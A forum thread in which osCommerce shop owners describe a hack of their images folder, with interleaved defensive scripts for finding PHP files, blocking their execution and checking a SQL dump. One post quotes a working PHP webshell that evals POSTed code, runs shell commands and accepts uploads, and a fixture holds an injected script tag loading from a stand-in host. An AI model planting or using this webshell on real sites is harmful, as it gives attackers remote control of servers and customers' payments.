
I'm on the evil list


dh2997

Posted

Hi, just still trying to find all the files from the EVIL hack, 3 days of drama.......

I found strange files in my image folder; one was a list of sites. My site was on the list from some kind of hack.

The bad files I have found so far are:

.cch/
.news/
news.dot
news.php
news.txt
page.php
sitemap.php
sites.txt
style.css
sys.php
key.txt
load.swf
mhp.php
m1.php
phpinfo.php

The google bot stuff looks like:

google3a778e90416873.php

The code looks like:

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

The PHP code in all the bad files mentioned evil somewhere in it... even in the encrypted code you see the trademark evil on it.

Basically ANY PHP file in your images is unusual; it should be .jpg and maybe some .gif.

So I made some changes:

I changed the name of the admin folder for the OsC and locked it with a .htaccess password.

I deleted the file manager in the control panel for OsC.

Changed all of my passwords for OsC.

I changed the permissions on my image folder to 755 (it will have to be changed back to 777 only while you are adding new product or need to add to the image file).

I am still going through the files and deleting bad ones.

There were some nasty PHP files asking the SQL for email passwords etc.

A PHP file that loaded a search box to upload any files to my image folder (I hope that is the only place where they were going).

There was a sites.txt file with a long list of sites; mine was on the list. (So now I'm on some world wide hacker list of easy victims.)

Changed the main password on my cPanel.

I can't do a backup in the OsC because I changed the admin name (still working on that path problem).

I have more to delete with OsC; they have way too much info available on the control panel.

The phpinfo.php was a copy of the server_info.php from the admin just sitting in my image file, public for all eyes!!!

I have some product items showing up in the specials that I did not add, a long list of A-Z Meds. It must be in the SQL DB files, so somehow they did get into that.

The hack starts with a few google bot files with EVIL in the code (I also found them in the image file on one of my other sites; I'm making the same changes to all of my sites).

Then it loads bad PHP files into the image file and gets into the control panel for OsC (where there is all the info they need).

I have been in the OsC forums and the goal of the hack seems to be to get customer info, passwords etc. and divert the PayPal funds to a diff account. Some sites said they even had fake orders.

I have changed all the passwords on PayPal.

I got new API passwords and signature.

I keep checking my site logs to see who is online, and the same IPs keep looking for these bad files: 66.249.71.143 and 98.230.158.29. I looked them up; they say they belong to Google and Comcast, also some from Amazon and Microsoft???? They are specifically looking for the bad file names?

OK so thanks for your time, I hope this was helpful to anyone cleaning up this mess.....

I would still like to remove the define_language.php in the admin if anyone has advice on that?

And how to make my backup work?

If there is any more advice anyone has for me or others with the same problem, please let me know.

Thanks!
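The post's rule of thumb (any PHP file under images/ is wrong, whatever it is named) can be turned into a script that lists such files and reports which of the constructs seen in the quoted code each one contains. This is an added example, not code from the post or from osCommerce; the directory it scans is a constructed fixture, and the stand-in PHP file in it carries the indicator strings only inside a comment so nothing executable is reproduced here.

```shell
#!/bin/sh
# Added example (not from the original post): audit an osCommerce images
# directory for PHP files and for the webshell constructs seen in the thread.
# The fixture directory and file names below are constructed assumptions.

# List every PHP-like file under the directory given as $1. Anything with a
# .php/.phtml/.phpN extension under images/ is suspect whatever it is called.
find_php_in_images() {
    find "$1" -type f \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.php[0-9]' \)
}

# Print, one per line and de-duplicated, which indicators a file contains:
# eval(, system()/passthru()/shell_exec(), move_uploaded_file(, or direct
# use of $_POST/$_GET/$_REQUEST, i.e. what the quoted one-liner does.
webshell_indicators() {
    grep -o -E 'eval\(|system\(|passthru\(|shell_exec\(|move_uploaded_file\(|\$_(POST|GET|REQUEST)\[' "$1" | sort -u
}

# Report every PHP file under $1 together with its indicator count.
# Output format: "<count> <path>", highest count first.
audit_images_dir() {
    find_php_in_images "$1" | while IFS= read -r f; do
        n=$(webshell_indicators "$f" | wc -l | tr -d ' ')
        printf '%s %s\n' "$n" "$f"
    done | sort -rn
}

# --- constructed fixture so the script runs stand-alone --------------------
IMAGES=$(mktemp -d)
printf 'not really a jpeg\n' > "$IMAGES/product1.jpg"
# Comment-only stand-in that carries the indicator strings without being a
# working shell; the real file quoted in the thread is NOT reproduced here.
printf '<?php /* fixture: eval( system( move_uploaded_file( $_POST[e] */ ?>\n' \
    > "$IMAGES/google3a778e90416873.php"

audit_images_dir "$IMAGES"
```

Run it against the real images directory with `audit_images_dir /path/to/catalog/images`; a count of zero on a file still means a PHP file is sitting where only images belong, so the find listing alone is worth acting on.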

Posted

Hack documented here (as best I could).

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."
- Me -

"Headers already sent" - The definitive help
"Cannot redeclare ..." - How to find/fix it
SSL Implementation Help

 

Like this post? "Like" it again over there >

Posted

My images folder was attacked and 'goog1e' files added after setting permission to 777. I had to, as anytime I set it to 755 my client couldn't upload images. The goog1e files seem to be the only files that have been added to the images folder, and none of the above you speak of. I renamed the admin folder and allowed certain IP addresses via htaccess.

How can I enable the 755 setting without breaking the image upload function for my client? There are a few more folders that require folder settings 777 in order for the site to work fully.

How can I check if the database hasn't been injected? Can I run a scan?

Very Concerned

Posted

For folders with "less than ideal" permissions you might consider this

It doesn't stop people from uploading their crap, but they can't run it after it is uploaded, thus rendering it useless.

I know of no "DB scanner" for osC.

If it were me I'd make a SQL backup of the DB and examine it with a text editor.

Not an ideal approach I realize.

Maybe someone else will pipe-up with a better idea.

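The link behind "you might consider this" did not survive, so here is the shape such a rule usually takes, as an added example that is not the poster's recipe: a .htaccess that makes Apache refuse to serve PHP from the upload directory (uploads still land, but return 403 instead of running), plus a check for directories still left at 777. It assumes Apache honours .htaccess for that tree (AllowOverride) and covers both the 2.4 (`Require`) and 2.2 (`Order`/`Deny`) syntax; the directory it operates on is a constructed fixture.

```shell
#!/bin/sh
# Added example (not from the original post): deny execution of PHP inside
# an upload directory and list directories that are still world-writable.
# Paths and the fixture are constructed assumptions; it assumes Apache
# honours .htaccess (AllowOverride) for the directory in question.

# Write a .htaccess into $1 that makes Apache refuse to serve anything with
# a PHP extension from that tree. An uploaded .php file is then answered
# with 403 rather than executed. Works on Apache 2.4 and 2.2.
write_deny_php_htaccess() {
    cat > "$1/.htaccess" <<'EOF'
# Uploaded files must never execute here: block every PHP-like extension.
<FilesMatch "\.(php|phtml|php[0-9])$">
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order Allow,Deny
        Deny from all
    </IfModule>
</FilesMatch>
EOF
}

# Exit 0 if the .htaccess in $1 carries the deny rule, non-zero otherwise.
htaccess_denies_php() {
    grep -q '<FilesMatch' "$1/.htaccess" 2>/dev/null &&
        grep -q -E 'Require all denied|Deny from all' "$1/.htaccess"
}

# Print every directory under $1 that is writable by everyone (the 777 the
# upload code needed). Each hit is a place where anyone who can reach the
# web server can drop a file, so the deny rule above must cover it.
world_writable_dirs() {
    find "$1" -type d -perm -0002
}

# --- constructed fixture ----------------------------------------------
IMAGES=$(mktemp -d)
mkdir -p "$IMAGES/open" "$IMAGES/closed"
chmod 777 "$IMAGES/open"
chmod 755 "$IMAGES/closed"

write_deny_php_htaccess "$IMAGES"
htaccess_denies_php "$IMAGES" && echo "PHP execution blocked under $IMAGES"
echo "Still world-writable:"
world_writable_dirs "$IMAGES"
```

The rule has to live in (or above) every directory the store needs at 777, and it only helps if the host has not set AllowOverride None; a quick way to confirm is to place a harmless test .php file in the folder and check that the browser gets a 403 for it.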

Posted

Hi

What should I be looking for when examining the DB text?

Posted

There is a hack going around that changes the email address in the DB associated with Paypal transactions.

I helped someone once that had the store name replaced with a malicious script in the DB.

Sometimes they may add a new administrator to the DB.

Those are the only concrete examples I can think of.

Just keep an eye out for things that don't look right.


Posted

I'm worried sick about this.

What lines/text should I be looking out for in the DB to find the link to the fake Paypal site?

Posted

Download the SQL backup file to your PC.

Open the SQL file with Wordpad and search for all the lines that have "Paypal" in them. Then check all the email addys on said lines.

Sincerely not meaning to be rude, crude, or obnoxious, but....

If you can't spot a hack when it stares you in the face you're wasting your time.

Find someone that can spot a hack and have them look it over.

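The Wordpad search described above (find the lines mentioning Paypal, check the addresses on them), done with grep over the dump so it can be repeated after every backup. This is an added example, not code from the thread or from osCommerce; the dump it reads is a constructed fixture, and the configuration key MODULE_PAYMENT_PAYPAL_ID and the administrators table are assumed to be the osCommerce 2.2 names. It also covers the two other DB changes mentioned earlier in the thread: a script injected into a text setting and an extra administrator row.

```shell
#!/bin/sh
# Added example (not from the original post): grep an osCommerce SQL dump
# for the three kinds of tampering the thread describes. The dump below is
# a constructed fixture; table and key names follow osCommerce 2.2 as an
# assumption.

# Every e-mail address that appears on a line mentioning PayPal, de-duplicated.
paypal_emails() {
    grep -i 'paypal' "$1" | grep -o -E '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}' | sort -u
}

# Same list minus the address you own ($2). Anything printed is a
# diverted-payment candidate and belongs in the "fix before reopening" list.
unexpected_paypal_emails() {
    paypal_emails "$1" | grep -v -x -F "$2" || true
}

# Lines whose data carries HTML/JS that no store setting should contain
# (the "store name replaced with a malicious script" case).
injected_markup_rows() {
    grep -n -i -E '<script|<iframe|javascript:' "$1" || true
}

# Rows being inserted into the administrators table; compare the user
# names against the accounts you actually created.
administrator_rows() {
    grep -i -E 'INSERT INTO `?administrators`?' "$1" || true
}

# --- constructed fixture ----------------------------------------------
DUMP=$(mktemp)
cat > "$DUMP" <<'EOF'
INSERT INTO configuration (configuration_key, configuration_value) VALUES ('STORE_NAME', 'My Store<script src="http://example.invalid/x.js"></script>');
INSERT INTO configuration (configuration_key, configuration_value) VALUES ('STORE_OWNER_EMAIL_ADDRESS', 'owner@example-store.test');
INSERT INTO configuration (configuration_key, configuration_value) VALUES ('MODULE_PAYMENT_PAYPAL_ID', 'unknown@changed.invalid');
INSERT INTO administrators (user_name, user_password) VALUES ('owner', '$HASH_PLACEHOLDER');
INSERT INTO administrators (user_name, user_password) VALUES ('support2', '$HASH_PLACEHOLDER');
EOF

echo "PayPal addresses other than payments@example-store.test:"
unexpected_paypal_emails "$DUMP" payments@example-store.test
echo "Rows with injected markup:"
injected_markup_rows "$DUMP"
echo "Administrator rows:"
administrator_rows "$DUMP"
```

Point the functions at the real dump (`unexpected_paypal_emails store.sql you@yourdomain.example`); an empty result for the first two checks and only the administrator rows you recognise in the third is what a clean dump looks like.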

Posted

When you say email addy do you mean the email address I have registered to my paypal account? This is my first time dealing with a hack on OScommerce. So I'm learning. Thanks for your assistance.

Archived

This topic is now archived and is closed to further replies.
